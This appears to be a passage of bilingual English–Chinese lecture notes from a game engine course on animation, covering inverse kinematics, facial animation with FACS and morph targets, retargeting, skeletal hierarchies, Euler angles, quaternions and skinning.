    • Instead of orientation space, solves lK problem in position space

      代替方向空间,解决位置空间中的 lK 问题

    Reachability

    ​可达性

    • Algorithm can stop after certain number of iterations to avoid unreachable target problem

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题

    FABRIKF with constraints

    ​有约束的 FABRIKF

    webp

    Re-positioning

    ​重新定位

    • Joint restrictions can be enforced at each step by taking the resultant orientation and forcing it to stay with in the valid range

      可以通过采用最终的方向并迫使其保持在有效范围内,在每一步中强制执行联合限制

    Multiple End-Effectors

    ​多个末端执行器

    webp

    • May result in conflict between goals, which can not be achieved simultaneously

      可能导致目标之间发生冲突,无法同时实现

    • May use a priority or a weighted approach

      可以使用优先级或加权方法

    IK with Multiple End-Effectors

    ​具有多个末端执行器的 IK

    webp

    If a shared bone needs to be moved, the end-effector that is updated last will get priority and the other bones will be pulled away

    ​如果需要移动共享骨骼,则最后更新的末端执行器将优先,其他骨骼将被拉走

    Jacobian Matrix

    ​雅可比矩阵

    webp

    In vector calculus, the Jacobian Matrix of a vector-valued function of severavariables is the matrix of all its first-order partial derivatives

    ​在向量微积分中,多个变量向量值函数的雅可比矩阵是其所有一阶偏导数的矩阵。

    ​课上说这个雅可比矩阵要放到物理那块去讲。

    Using Jacobian Matrix to Present Joint Rotations

    ​使用雅可比矩阵表示关节旋转

    webp

    Jacobian Matrix with Multiple End-effectors

    ​具有多个末端执行器的雅可比矩阵

    $$J=\begin{bmatrix}\frac{\partial\overrightarrow{s_1}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_1}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_1}}{\partial\theta_n}\\frac{\partial\overrightarrow{s_2}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_2}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_2}}{\partial\theta_n}\\vdots&\vdots&\ddots&\vdots\\frac{\partial\overrightarrow{s_m}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_m}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_m}}{\partial\theta_n}\end{bmatrix}$$

    m: the number of end-effectors

    ​$m$:末端执行器的数量

    n: the number of joints

    ​$n$:关节数量

    Approaching to Target Step by Step

    ​一步步接近目标

    webp

    Other lK Solutions

    ​其他 lK 解决方案

    Physics-based Method

    ​基于物理的方法

    • More natural

      更自然

    • Usually need lots of computation if no optimization

      如果没有优化,通常需要大量计算

    PBD (Position Based Dynamics)

    ​PBD(基于位置的动力学)

    • Different from traditional physics-based method

      与传统的基于物理的方法不同

    • Better visual performance

      更好的视觉表现

    • Lower computational cost

      较低的计算成本

    Fullbody IK in UE5

    ​UE5 中的全身 IK

    • XPBD (Extended PBD)

      XPBD(扩展 PBD)

    IK is still Challenge

    ​IK 仍然是挑战

    webp

    • Self collision avoidance

      自我避免碰撞

    • IK with predication during moving

      移动过程中带有预测的 IK

    • Natural human behavior

      人类的自然行为

      • Data-driven and deep learning

        数据驱动和深度学习

    ​如果做不好容易出现奇葩动画。

    IK Hot Research Areas

    webp

    From Inverse Kinematics Techniques in Computer Graphics: A Survey

    这篇综述认为 IK 式目前的研究热点。

    Updated Animation Pipeline with Blending and lK

    ​使用混合和 lK 更新了动画管道

    webp

    Facial Animation

    ​表情动画

    Face is Driven by Complex Muscle System

    ​现实世界中,面部由复杂的肌肉系统驱动

    webp

    • 43 Muscles

      43 块肌肉

    • Variant shape, strength andmovement

      不同的形状、力量和动作

    • Work together to make expressions

      一起努力制作表情

    High Precision Requirements

    ​高精度要求

    Minor change makes difference:

    ​微小的改变就会带来不同:

    • Voluntary / Forced

      自愿 / 强迫

    • Natural / intentional

      自然 / 故意

    • Sometimes shows quite opposite expressions

      有时表现出完全相反的表情

    Facial Action Coding System

    ​面部动作编码系统

    Facial Action Coding System (FACS) is a system to taxonomize human facial movements by their appearance on the face.

    ​面部动作编码系统(FACS)是一种根据人类面部动作在面部的外观进行分类的系统。

    webp

    Part of 46 basic movements are named action units (AU)

    ​46 个基本动作中的一部分被称为动作单元 (AU)

    Action Units combination

    ​动作单元组合

    webp

    An expression can be considered as a combination of some of the basic movements

    ​一个表情可以被认为是一些基本动作的组合

    28 Core Action units

    ​28 个核心动作单元

    webp

    • Apple Inc. extracted the 28 core AUs

      Apple Inc. 提取了 28 个核心 AU

    • 23 Symmetric AUs are divided into two basic actions

      23 个对称 AU 分为两个基本动作

    • Basic actions set varies accoring to the animation production requirements

      基本动作设置根据动画制作要求而变化

    Key Pose Blending

    ​关键姿势混合

    webp

    A set of key poses (a variation on per-vertex animation)

    ​一组关键姿势(逐顶点动画的变体)

    Problems of Simple Blending

    webp

    ​简单的表情动画混合可能不太好使。比如我想用一个张嘴和闭眼的动作合成一个既张嘴又闭眼的动作。

    FACS In Morph Target Animation

    ​变形目标动画中的 FACS

    webp

    Vertex offset from neutral face

    ​顶点与中性面的偏移

    • Create AU key poses only store vertexes different from the neutral pose (Additive Blending)

      创建所有关键姿势仅存储与中性姿势不同的顶点(加法混合)

    Morph Target Animation

    ​变形目标动画

    webp

    webp

    ​一般表情动画都是顶点动画,不过也可以用骨骼动画强行做。

    UV Texture Facial Animation

    ​UV 纹理面部动画

    webp

    Using a series of texture maps applied to a simple head shape

    ​使用一系列应用于简单头部形状的纹理贴图。Live2D 就是这么做的。

    Muscle Model Animation

    webp

    In the reliance on a physical basis, more precise, but more sophisticated

    ​在依赖物理基础上,更精确,但更复杂。还在研究阶段,没用被广泛应用。

    • Muscle controls most part of the face

      肌肉控制着脸部的大部分

    • 3Layers: Skin Layer, Muscle Layer, Bone Layer

      3 层:皮肤层、肌肉层、骨骼层

    • The point of insertion will move an amount determined by the muscle

      插入点将移动由肌肉决定的量

    The model used for the skin will dictate how the area around the insertion point muscle reacts

    ​用于皮肤的模型将决定插入点肌肉周围的区域如何反应

    Metahuman

    ​超人类

    Animation Retargeting

    ​动画重定向

    Share Animation Among Characters

    ​在角色之间共享动画

    webp

    • Allow animations to be reused between characters (save animator’s work)

      允许在角色之间重复使用动画(节省动画师的工作)

    • Adapt motion captured animations to different characters (reduce the cost)

      使动作捕捉动画适应不同的角色(降低成本)

    Terminology

    ​术语

    webp

    ​已知 Source Character、Target Character 和 Source Animation,求 Target Animation。

    Ignore Offset Between Source and Target joints

    ​忽略源关节和目标关节之间的偏移

    webp

    Keep Orientation in Different Binding Pose

    ​保持不同绑定姿势的方向

    webp

    Process Tracks

    ​进程轨迹

    webp

    Handle animation tracks respectively

    ​分别处理动画轨迹

    • Rotation track comes from source animation

      旋转轨迹来自源动画

      • Keep joint orientation in animation

        保持动画中的关节方向

    • Translation track comes from target skeleton

      变换轨迹来自目标骨架

      • Keep the proportion of target skeleton

        保持目标骨骼的比例

    • Scale track comes from source animation

      音阶轨迹来自源动画

      • Keep the scale in animation

        保持动画比例

    Align Movement by Pelvis Height

    ​根据骨盆高度对齐运动

    webp

    The movement of the character

    ​角色的动作

    • Usually controlled by displacement curve or motor system at runtime

      通常在运行时由位移曲线或电机系统控制

      • Displacement Curve is extracted from the pelvis pose in animation

        位移曲线是从动画中的骨盆姿势中提取的

    • Needs to be scaled by the proportion of the pelvis

      需要根据骨盆的比例进行缩放

    Lock Feet by lK after Retargeting

    ​重新定位后将脚锁定 lK

    webp

    Source Skeleton (left) vs. Target Skeleton with longer thigh (middle) or longer calf (right)

    ​源骨骼(左)与大腿较长(中)或小腿较长(右)的目标骨骼

    webp

    If the thigh is horizontal (left), longer thigh results in hanging feet (middle) while longer calf results in penetration (right)

    ​如果大腿是水平的(左),较长的大腿会导致悬足(中),而较长的小腿则会导致穿透(右)

    Retargeting with Different Skeleton Hierarchy

    ​使用不同的骨架层次结构进行重定向

    webp

    Source Skeleton with 1spine (left) vs. Target Skeleton with 3spines (center)

    ​具有 1 个脊柱的源骨骼(左)与具有 3 个脊柱的目标骨骼(中)

    ​不同人物的骨骼数量可能不同。

    Easy Solution

    webp

    ​绑定骨骼时做好严格的规范,这样就能做到不同数量骨骼间的映射。

    Retargeting Animation in Omniverse

    ​Omniverse 中的重定向动画

    Unresolved Problems of Retargeting

    ​未解决的重定向问题

    webp

    • Self mesh penetration

      自网格穿透

    • Self contact constrains (eg. the hands when clap)

      自我接触限制(例如拍手时的手)

    • The balance of the target character

      目标角色的平衡性

    Morph Animation Retargeting

    ​变形动画重定向

    webp

    Different face sharing the same topology

    ​不同的面共享相同的拓扑

    Morph Animation Retargeting Peoblem

    webp

    webp

    ​动画重定向后眼睛闭不上之类的问题。

    Take Away

    • Controlled animation blending system is the key to animate character according to game play

      受控动画混合系统是根据游戏玩法制作角色动画的关键

    • Inverse Kinematics help character’s animation adapt to environment constrains

      逆运动学帮助角色的动画适应环境限制

    • Facial expression can be encoded in Action Units in FACS

      面部表情可以编码在 FACS 的动作单元中

    • Morph target animation is well applied in facial animation

      变形目标动画在面部动画中得到很好的应用

    • Retarget can help reuse skeleton animation and facial animations among characters

      重新定位可以帮助在角色之间重用骨骼动画和面部动画

    ]]>
    + 资源

    课程

    第八节:游戏引擎的动画技术基础

    Animation System

    Basics of Animation Technology

    Humans have been trying to represent object in motion

    ​人类一直在尝试表现运动中的物体

    webp

    webp

    • The persistence of vision

      视觉暂留

    • lllusory motion

      虚幻的运动

    webp

    Animation Techniques in Film

    ​动画产业最早从电影兴起。

    webp

    webp

    • Hand Draw Animation

      手绘动画

    • Cel Animation

      赛璐珞动画

    ​Cel animation 是一种传统的动画制作技术,也被称为传统动画。它是通过在透明的塑料或树脂片上手绘动画角色和背景,然后将它们叠加在一起,逐帧拍摄来制作动画。这种技术在过去几十年一直被广泛应用,直到计算机动画技术的出现。

    • Computer Animation

      计算机动画

    Animation Techniques in Game

    webp

    ​最早的游戏动画来自 2D。Doom 是一个用 2D 技术做的 3D 效果的游戏。

    webp

    • Rigid Hierachy Animation

      刚性层阶式动画,容易穿模

    • Soft Skinned Animation

      蒙皮动画

    • Physics Animation

      物理动画

    Challenges in Game Animation (1/3)

    webp

    Interactive and dynamic animation

    ​互动和动态动画

    • Vary according to the interaction

      根据互动而变化

    • Cooperate with other gameplay systems

      与其他游戏系统配合

    • Make adjustments in complex environments

      在复杂环境下进行调整

    Challenges in Game Animation (2/3)

    webp

    Real-time

    • Compute per frame

      逐帧计算(在一帧内完成所有计算)

    • Massive animation data (Disk and memory)

      海量动画数据(磁盘和内存)

    Challenges in Game Animation (3/3)

    Realism

    ​现实主义

    • More vivid expression

      更生动的表达

    • More authentic experience

      更真实的体验

    webp

    • Facial Animation

      面部动画

    • Ragdoll Physics

      布娃娃物理

    • Motion Matching

      运动匹配

    Outline of Animation System

    • Basics of Animation Technology

      动画技术基础

      2D Animation

      2D 动画

      3D Animation

      3D 动画

      Skinned Animation lmplementation

      蒙皮动画实现

      Animation Compression

      动画压缩

      Animation DCC

    ​动画 DCC 是指动画数字内容创建(Digital Content Creation)工具,通常是指用于制作电影、电视、游戏和其他数字媒体内容的软件套件。这些工具能够帮助动画师和艺术家制作、编辑和渲染动画和视觉效果,从而实现各种复杂和精细的动画效果。

    • Advanced Animation Technology

      先进的动画技术

      Animation Blend

      动画混合

      Inverse Kinematics

      逆运动学

      Animation Pipeline

      动画管线

      Animation Graph

      动画图

      Facial Animation

      面部动画

      Retargeting

      重定向

    2D Animation lechnigues in Games

    2D Animation-Sprite animation

    webp

    The electronic equivalent to cel animation

    ​相当于赛璐珞动画的电子版

    • A sprite is a small bitmap that can be overlaid on top of a background image without disrupting it

      精灵是一个小位图,可以覆盖在背景图像之上而不破坏它

    • The sequence of frames was designed so that it animates smoothlyeven when it is repeated indefinitely

      帧序列经过精心设计,即使无限重复,动画也能流畅进行

    The Sprite-like animation technique in pseudo-3D game

    ​伪 3D 游戏中的类精灵动画技术

    webp

    ​用 2D 画出 3D 中各个视角的图片。

    Sprite Animation in Modern Game

    webp

    Application

    ​应用

    • 2D character

      2D 角色

      • Sprite on 2D background image

        2D 背景图像上的精灵

      • Sprite on top of 3D rendered environment

        3D 渲染环境之上的精灵

    • Game effect

      游戏效果

      • Sprite sheet texture for particles

        粒子的精灵片纹理

    Live2D

    webp

    A technology to generate 2D animation without 3D model

    ​一种无需 3D 模型即可生成 2D 动画的技术

    • Usually refer to eponymous software series epmloying the technology created by Live2D Ltd.

      通常指采用 Live2D Ltd. 创建的技术的同名软件系列。

    • Could develop dynamic character, especially anime-style character without a 3D model

      无需 3D 模型即可开发动态角色,尤其是动漫风格的角色

    webp

    • By applying translation, rotation and transformation to different parts and layers of image.

      通过对图像的不同部分和图层应用平移、旋转和变换。

    • Combined with real-time motion capture, could be used for vtubing

      结合实时动作捕捉,可用于 vtubing

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Prepare resources

    ​准备资源

    • Dividing origin character image into different parts

      将原始角色图像分为不同的部分

    • Set “draw order” to each parts for further use

      为每个零件设置“绘制顺序”以供进一步使用

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Transform image by using control points for parts

    ​使用零件的控制点变换图像

    • “ArtMesh” could be automately generated for each parts, which defined by vertices, edges and polygons

      可以为每个部分自动生成“ArtMesh”,由顶点、边和多边形定义

    • Control points could be used to help transforming "ArtMesh’

      控制点可用于帮助改造“ArtMesh”

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Set animation “key frame”

    ​设置动画“关键帧”

    • Set “key frame” to help animation interpolation

      设置“关键帧”以帮助动画插值

    3D Animation lechnigues in Games

    DoF (Degrees of Freedom)

    webp

    • refers to the number of independent variables or parameters of a system

      指系统的自变量或参数的数量

    DoF For rigid objects

    ​DoF 对于刚性物体

    webp

    • 6 DoFs per object or sub-part

      每个对象或子部分有 6 个自由度

    Rigid Hierarchical Animation

    ​刚性层阶式动画

    webp

    • The earliest approach to 3D character animation

      最早的 3D 角色动画方法

    • A character is modeled as a collection of rigid pieces

      角色被建模为刚性部件的集合

    • The rigid pieces are constrained to one another in a hierarchical fashion

      刚性部件以分层方式相互约束

    Per-vertex Animation

    ​顶点动画

    webp

    ​与蒙皮动画相比,顶点动画更适合模拟流体或是布匹。

    • Most flexible (3 DoFs per vertex)

      最灵活(每个顶点 3 个自由度)

    • Mostly implemented by Vertex Animation Texture (VAT)

      主要由顶点动画纹理(VAT)实现

    • Suitable for complex morphing

      适用于复杂的变形

    • Need massive data

      需要海量数据

    Morph Target Animation

    webp

    • A variation on Per-vertex Animation

      每个顶点动画的变体

      • Use key frames with LERP instead of sequence frames(e.g. 30 frames per second

        使用带有 LERP 的关键帧而不是序列帧(例如每秒 30 帧)

    • Suitable for facial expression

      适合面部表情

    3D Skinned Animation

    webp

    • Mesh (or skin) is bound to the joints of the skeleton

      网格(或皮肤)绑定到骨骼的关节

    • Each vertex can be weighted to multiple joints

      每个顶点可以加权到多个关节

    Advantages

    ​优点

    • Need less data than per-vertex animation

      比逐顶点动画需要更少的数据

    • Mesh can be animated in a natural way (like human “skin”)

      网格可以以自然的方式进行动画处理(就像人类的“皮肤”)

    2D Skinned Animation

    webp

    Derived from 3D skinned animation

    ​源自 3D 蒙皮动画

    • Break up character into various body parts

      将角色分解为不同的身体部位

    • Create body part meshes and piece them together

      创建身体部位网格并将它们拼凑在一起

    • Rigging, skinning and animation

      绑定、蒙皮和动画

    Physics-based Animation

    webp

    • Ragdoll

      布娃娃

    • Cloth and Fluid simulation

      布料和流体模拟

    • Inverse Kinematics (IK)

      逆运动学 (IK)

    Animation Content Creation

    webp

    ​动画内容创作方式:

    • Digital Content Creator + Animator

      数字内容创作者 + 动画师

    • Motion Capture

      动作捕捉

    Skinned Animationimp lementation

    ​蒙皮动画实现

    webp

    How to Animate a Mesh

    ​如何制作网格动画

    1. Create mesh for a binding pose

      为绑定姿势创建网格

    2. Create a binding skeleton for the mesh

      为网格创建绑定骨架

    3. “Paint” per-vertices skinning weights to related skeleton

      将每个顶点蒙皮权重“绘制”到相关骨架

    4. Animate skeleton to desired pose

      将骨骼动画化为所需的姿势

    5. Animate skinned vertices by skeleton and skinning weights

      通过骨架和蒙皮权重对蒙皮顶点进行动画处理

    Different Spaces

    webp

    ​要考虑三个坐标系:

    • Local space, Model space and World space

      局部坐标,模型坐标和世界坐标

    Skeleton for Creatures

    ​生物骨骼

    webp

    Comprised of a hierarchy of rigid pieces known as joints

    ​由称为关节的刚性部件的层次结构组成

    • One joint is selected as the root

      选择一个关节作为根

    • Every joint has a parent joint except the root

      除根关节外,每个关节都有一个父关节

    Joint vs. Bone

    ​关节和骨骼

    webp

    • The joints are the objects directly manipulated by the animator to control motion

      关节是动画师直接操纵以控制运动的对象

    • The bones are the empty space between the joints

      骨头是关节之间的空隙

    Humaniod Skeleton in Real Game

    ​真实游戏中的人形骨骼

    webp

    Number of joints in a humaniod skeleton

    ​人形骨骼中的关节数量

    • Normal: 50~100 joints

      正常:50~100 个关节

    • May more than 300+ joints includefacial joints and gameplay joints

      可能超过 300+ 关节,包括面部关节和游戏关节

    Joints for Game Play

    webp

    • Additional joints

      附加关节

    • Weapon joint

      武器关节

    • Mount joint

      安装接头

    Where to Start the Skeleton - Root Joint

    ​一般都是髋关节做 Pelvis joint,脚底中心作 Root joint

    webp

    Root joint

    ​根关节

    • The center of the feet

      脚的中心

    • Convenient to touch the ground

      方便接触地面

    Pelvis joint

    ​骨盆关节

    • The first child joint of the root joint

      根关节的第一个子关节

    • Human upper and lower body separation

      人体上下半身分离

    How to Handle Horse Skeleton?

    webp

    ​一般把马的 Pelvis joint 和 Root joint 放置在如图位置。

    Bind Animation for Objects

    ​为对象绑定动画

    webp

    Attach two skeleton’s bind point

    ​连接两个骨架的绑定点

    Bind Pose-T-pose vs. A-pose

    ​绑定姿势-T 姿势与 A 姿势

    webp

    The pose of the 3D mesh prior to being bound to the skeleton

    ​3D 网格在绑定到骨架之前的姿势

    • Keep the limbs away from the body and each other, making the process of binding the vertices to the joints easier

      使四肢远离身体和彼此,使将顶点绑定到关节的过程更容易

    • Usually close to natural pose

      通常接近自然姿势

    T-pose vs A-pose

    • Shoulders in A-pose are more relaxed

      A 字式的肩膀更加放松(T 字式的肩膀容易挤压导致扭曲,所以现在更偏好 A 字式)

    • Easy to defarmating in A-pose

      轻松以 A 姿势解除武装(?)

    Skeleton Pose

    Skeleton Pose: A skeleton is posed by transform its joints from the bind pose

    ​骨骼姿势:通过从绑定姿势变换其关节来摆出骨骼姿势

    webp

    Joint Pose (9 DoFs)

    ​关节姿势(9 个自由度)

    • Orientation (3 DoFs)

      方向(3 个自由度)

    • Position (3 DoFs)

      位置(3 个自由度)

    • Scale (3 DoFs)

      比例(3 个自由度)

    Math of 3D Rotation

    2D Orientation Math

    webp

    ​2D 旋转用一个 $\alpha$ 来表示很简单。

    3D Orientation Math

    Euler Angle

    ​用欧拉角来表示三维旋转。

    • 3D-Rotation by single axis

      以 $x,y,z$ 某个轴旋转 $\alpha,\beta,\gamma$

    webp

    • 3D-Rotation combined by $x, y, z$ axis sequentially

      由 $x, y, z$ 轴顺序组合的 3D 旋转

    webp

    Euler Angle

    Euler Angle provides a brief description of 3D rotation and is widely used in many fields

    ​欧拉角提供了 3D 旋转的简要描述,广泛应用于许多领域

    webp

    • Yaw angle:$\psi$ 飞机左右转弯
    • Pitch angle:$\theta$ 飞机抬头低头
    • Roll angle:$\phi$ 飞机左右倾斜

    Order Dependence on Euler Angle

    ​欧拉角的阶次依赖性

    webp

    ​欧拉角旋转看上去直观,但是旋转次序将会影响最终的旋转效果。

    Gimbal Lock

    ​万向节锁

    webp

    ​Gimbal Lock 是三维空间中的一个现象,通常发生在使用欧拉角(Euler Angles)描述物体旋转时,尤其是在使用万向节(Gimbal)结构进行旋转时。这个现象会导致失去一个旋转自由度,使得物体在某些情况下无法继续按预期旋转。

    ​为了理解 Gimbal Lock,首先需要了解欧拉角和万向节结构。

    欧拉角是一种描述物体旋转的方法,通过三个轴(通常是 X、Y、Z 轴)的旋转角度来表示物体的方向。然而,当旋转过程中某两个轴对齐时,就会发生 Gimbal Lock。

    ​万向节是一种机械结构,由多个轴构成,每个轴都可以绕自己的轴旋转。但当其中两个轴对齐时,就会发生 Gimbal Lock,因为这会使得第三个轴失去了自由度。

    ​具体来说,当两个轴对齐时,旋转操作将不再在三个轴的独立空间内进行,而是会导致旋转操作影响到其他轴,从而导致无法预期的结果。这使得物体在某些情况下无法继续自由旋转,因为其中一个轴的旋转将会影响到其他轴的方向,导致失去了自由度。

    ​为了避免 Gimbal Lock,可以使用其他方法来描述旋转,如四元数(Quaternions),它们不会受到 Gimbal Lock 的限制。此外,在使用欧拉角时,可以采用一些技巧和限制来尽量避免 Gimbal Lock 的发生。

    Degeneration of Euler Angle

    ​欧拉角退化

    webp

    Problems of Euler Angle

    ​欧拉角问题

    webp

    Rotation Combination

    ​旋转结合

    webp

    Rotation By Certain Axis

    ​按特定轴旋转


    • Gimbal Lock

      万向节锁

      Gimbal Lock occurs because of the loss of one DoF

      由于失去一个自由度而发生万向节锁定

    • Hard to interpolate

      难以插值

      Singularity problem make it hard to interpolate

      奇点问题使得插值变得困难

    • Difficult for rotation combination

      旋转组合困难

      Rotation combination need rotation matrix

      旋转组合需要旋转矩阵

    • Hard to rotate by certain axis

      难以按特定轴旋转

      Easy to rotate by $x,y,z$ axis but hard to others

      很容易通过 $x$、$y$、$z$ 轴旋转,但对其他人来说很难

    Quaternion

    ​四元数用于表示旋转。

    ​它们结构紧凑,不受万向锁影响,可以轻松插值。 Unity 内部使用四元数来表示所有旋转。

    ​它们基于复数,不容易理解。 您几乎不会有机会访问或修改单个四元数分量($x$、$y$、$z$、$w$); 大多数情况下,您只需要获取现有旋转(例如,来自 Transform),然后使用它们构造新的旋转 (例如,在两个旋转之间平滑插值)。 您绝大多数时间使用的四元数函数为: Quaternion.LookRotationQuaternion.AngleQuaternion.EulerQuaternion.SlerpQuaternion.FromToRotationQuaternion.identity。(其他函数仅用于一些十分奇特的用例。)

    引入四元数解决万向节锁的问题。

    webp

    Every morning in the early part of October 1843, on mycoming down to breakfast, your brother William Edwin and yourself used to ask me: “Well, Papa, can you multiply triples?” Whereto I was always obliged to reply, with a sad shake of the head, "No, Ican onlyadd and subtract them.

    ​1843 年 10 月上旬,每天早上,当我下楼吃早餐时,你的兄弟威廉·埃德温和你自己都会问我:“爸爸,你能乘以三倍吗?”对此,我总是不得不悲伤地摇头回答:“不,我只能加减它们。

    Complex Number and 2D Rotation

    ​引入复数概念探讨 2D 旋转问题。

    Complex Number

    • Definition

      $c=a+bi\ (a,b\in\mathbb{R})$

      $i^2=-1$

    • Represent as Vector

      $c=\begin{bmatrix}a\b\end{bmatrix}$

    • Product

      $c_1=a+bi\quad c_2=c+d_i\quad c_1c_2=\begin{bmatrix}a&-b\b&a\end{bmatrix}\begin{bmatrix}c\d\end{bmatrix}$

    webp

    ​对于角 $\alpha$ 用 $z=a+bi$ 表示,角 $\beta$ 用 $w=c+di$ 表示,则 $\alpha+\beta$ 可以用 $zw=(a+bi)(c+di)$ 表示。

    Quaternion

    类比与 2D,用四元数表示三维的旋转。

    Quaternion

    • Definition

      $q=a+bi+cj+dk\quad(a,b,c,d\in\mathbb{R})\i2=j2=k^2=ijk=-1$

    • Represent as two parts pair (real number and vector)

      表示为两部分对(实数和向量)

      $q=(a,v)\quad(v=\begin{bmatrix}b\c\d\end{bmatrix},a,b,c,d\in\mathbb{R})$

    • Product

      $q_1=a+bi+cj+dk\q_2=e+fi+gj+hk\q_1q_2=\begin{bmatrix}a&-b&-c&-d\b&a&-d&c\c&d&a&-b\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\f\g\h\end{bmatrix}$

      用 $q_1q_2$ 表示先旋转 $q_1$ 再旋转 $q_2$

    • Norm

      $||q||=\sqrt{a2+b2+c2+d2}$

    • Conjugate

      共轭

      $q^*=a-bi-cj-dk$

    • Inverse

      $q{-1}q=qq{-1}=1$

    Euler Angle to Quaternion

    webp

    $$q=[1\quad i\quad j\quad k]\begin{bmatrix}\cos(\gamma/2)\cos(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\sin(\gamma/2)\cos(\beta/2)\cos(\alpha/2)-\cos(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\cos(\gamma/2)\sin(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\cos(\beta/2)\sin(\alpha/2)\\cos(\gamma/2)\cos(\beta/2)\sin(\alpha/2)-\sin(\gamma/2)\sin(\beta/2)\cos(\alpha/2)\end{bmatrix}$$

    Rotation by Quaternion

    Quaternion

    • Vector to quaternion

      • A 3D vector $\mathbf v$ could be written inquaternion format as follow:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\c\d\end{bmatrix}$

    • Rotation

      $v_q{\prime}=qv_qq*=qv_qq^{-1}$

    $$q^*=a-bi-cj-dk$$

    $$q_1=a+bi+cj+dk\q_2=e+fi+gj+hk\q_1q_2=\begin{bmatrix}a&-b&-c&-d\b&a&-d&c\c&d&a&-b\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\f\g\h\end{bmatrix}$$

    Quaternion to Rotation Matrix

    $$\begin{aligned}&q=(a,b,c,d)\quad||q||=1\&v{\prime}=\begin{bmatrix}1-2c2-2d2&2bc-2ad&2ac+2bd\2bc+2ad&1-2b2-2d2&2cd-2ab\2bd-2ac&2ab+2cd&1-2b2-2c^2\end{bmatrix}v\end{aligned}$$

    Rotation wath by Quaternion

    Inverse Resolving

    ​逆旋转

    webp

    $$q{-1}=\frac{q*}{||q||^2}$$

    Rotation Combination

    ​复合旋转

    webp

    $$\begin{aligned}
    q_1*q_2&=(q_2q_1)^ \
    v{\prime}&=q_1vq_1* \
    v{\prime\prime}&=q_2v{\prime}q_2^* \
    &=q_2q_1vq*_1q_2 \
    &=(q_2q_1)v(q_2q_1)^

    \end{aligned}$$

    Quaternion between Two Unit Vectors

    ​两个单位向量之间的四元数

    webp
    $$
    w=u\times v \
    q=[u\cdot v+\sqrt{(w\cdot w)+(u\cdot v)^2},w] \
    (||u||=||v||=1)
    $$

    Given Axis Rotation by Quaternion

    Quaternion

    webp

    • Vector to quaternion

      向量到四元数

      • A 3D vector $\mathbf v$ could be written in quaternion format as follow:

        3D 向量 $\mathbf v$ 可以写成四元数格式,如下所示:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\c\d\end{bmatrix}$

    • Rotation

      • For vector $\mathbf v$, rotated by unit axis $u$ of angle $\theta$, the result vector $v’_q$

        对于向量 $\mathbf v$,按角度 $\theta$ 的单位轴 $u$ 旋转,结果向量 $v’_q$

    $$q=(\cos(\frac\theta2),\sin(\frac\theta2)x_u,\sin(\frac\theta2)y_u,\sin(\frac\theta2)z_u)$$

    $$v’_q=qv_qq*=qv_qq{-1}$$

    $u=\begin{bmatrix}x_u\y_u\z_u\end{bmatrix}$ is a unit vector represents rotation axis

    $u=\begin{bmatrix}x_u\y_u\z_u\end{bmatrix}$ 是表示旋转轴的单位向量

    Joint Pose

    ​关节动作

    Joint Pose - Orientation

    ​关节姿势 - 方向

    webp

    • Rotation -> Change the Orientation of joints

      旋转 -> 更改关节方向

    • Most skeleton poses change orientations of joints only

      大多数骨骼姿势仅改变关节的方向

    Joint Pose - Position

    webp

    • Translate ->change postion

      变换->改变位置

    • Translate point $P$ to point $P’$ by vector $T$

      通过向量 $T$ 将点 $P$ 变换为点 $B’$

    webp

    • Usually not changed in humanoid skeleton except the pelvis, facial joint and other special joints

      人形骨骼除骨盆、面部关节等特殊关节外通常不发生改变

    • Used for stretching models

      用于拉伸模型

    Joint Pose - Scale

    webp

    • Scale -> change the size of the model

      缩放 -> 更改模型的大小

    • Uniform vs. Non-uniform Scale

      均匀比例与非均匀比例

    webp

    • Widely used in facial animation

      广泛应用于面部动画

    • Uniform and non-uniform scale facial ioints

      均匀和不均匀比例的面部关节

    Joint Pose - Affine Matrix

    webp

    ​将变换旋转缩放用一个仿射矩阵表示。

    Joint Pose-Local Space to Model Space

    ​联合姿势局部空间到模型空间

    webp

    For a joint $j$ in a skinned mesh

    ​对于蒙皮网格中的关节 $j$

    • $p(j)$ : Joint $j$'s parent joint

      $p(j)$ :关节 $j$ 的父关节

    • $M’_{p(j)}$ : Joint $j$'s parent joint pose in local space

      $M’_{p(j)}$ :关节 $j$ 的父关节在局部空间中的姿势

    $M^m_J$ : joint $J$'s pose in model space

    ​$M^m_J$:模型空间中关节 $J$ 的姿势

    • Walking the skeletal hierarchy from $J$ to the root:

      从 $J$ 到根遍历骨架层次结构:

    $$M_{j}{m}=\prod_{j=J}{0}M_{p(j)}^{l}$$

    Joint Pose interpolation-Local Space vs.Model Space

    ​关节姿态插值-局部空间与模型空间

    webp

    Local Space

    ​局部空间

    • Less data with delta transform

      通过增量变换减少数据

    • Convenient for interpolation or blend

      方便插值或混合

    webp

    Model Space

    ​模型空间

    • Incorrect for interploation

      插值不正确

    Single joint Skinning

    ​单关节蒙皮

    webp

    Vertex $V$'s position in joint $J$'s local space is fixed

    ​顶点 $V$ 在关节 $J$ 的局部空间中的位置是固定的

    Attach the vertices of a mesh to a posed skeleton

    ​将网格的顶点附加到已摆好姿势的骨架上

    • Each vertex can be bound to one or more joints with a weight parameter

      每个顶点可以通过权重参数绑定到一个或多个关节

    • The vertex position in each bound joint’s local space is fixed

      每个绑定关节局部空间中的顶点位置是固定的

    Skinning Matrix

    ​蒙皮矩阵

    webp

    Bind Pose: the skeleton pose for binding

    绑定姿势:绑定的骨骼姿势

    For a mesh vertex $V$ which is bound to a joint $J$

    ​对于绑定到关节 $J$ 的网格顶点 $V$

    • $V^m_b$: $V$'s position in model space within bind pose

      $V^m_b$:$V$ 在模型空间绑定姿势中的位置

    • $V^l_b$ : $V$'s position in local space within bind pose

